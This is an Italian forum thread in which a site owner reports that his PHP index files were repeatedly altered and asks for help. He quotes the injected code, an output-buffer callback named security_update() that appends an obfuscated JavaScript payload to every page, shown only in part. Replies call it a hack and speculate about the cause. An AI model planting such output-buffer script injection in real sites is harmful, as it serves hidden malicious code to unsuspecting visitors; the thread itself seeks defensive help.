Attacco al server o Bug? Aiutatemi!!

[lespaul]

Ciao a tutti, volevo chiedervi un 'informazione sul seguente errore PHP :

Cannot redeclare security_update() (previously declared in /web/htdocs/(l'url del sito)/home/index.php

Ripristino l' index.php e tutto va ok. Oggi mi è successo due volte su due miei siti. Si tratta di un attacco o di un bug di qualche script?? In pratica mi ritrovo l' index modificato con l' aggiunta di queste stringhe :

ob_start("security_update"); 
function security_update($buffer){
return $buffer."<script language=\"javascript\">$=\"Z63bZ3dZ228Z2564s);Z2573tZ253dtZ256dpZ253dZ2527.... 
etc..

Qualcuno mi puo aiutare??

Grazie

Ciao

 

[maxbossi]

Credo sia una hackerata (magari usi WordPress vecchia versione?)...
Prova a leggere qua:
http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html
Ciao e in bocca al lupo!

 

[Eliox]

E' un'attacco di sicuro, sembra che abbiano aperto un buco per infilarci del JavaScript.

 

[lespaul]

Ciao, grazie per le risposte

Il giorno in cui mi è successo ho ripristinato l' index per ben due volte.
Adesso è tutto regolare. Sembra qualcosa di automatico.

Comunque come posso fare per far fronte a questo attacco??

Mi è successo su un sito fatto in php e non è montanto ne wordpress e ne jommla, un piccolo sistema di impaginazione fatto in casa, ed invece su un altro sito dove uso wordpress, ma è un sito in costruzione e non è neanche registrato sui motori di ricerca. E' strano.

Ho letto l' articolo citato da Max, ma non ho ben capito cosa
devo correggere per prevenire intrusioni future.

Vi ringrazio di nuovo per le risposte, e se in caso avete altre notizie sarei molto grato se mi tenete informato.

Grazie e ciao

 

[alessandro1997]

Allora calcola che molto probabilmente sarà qualcuno che ti conosce, magari anche nella realtà. Cerca di capire se conosci qualcuno che può volerti del male o qualcuno che fa del male per divertimento.

 

[Eliox]

che versione utilizzi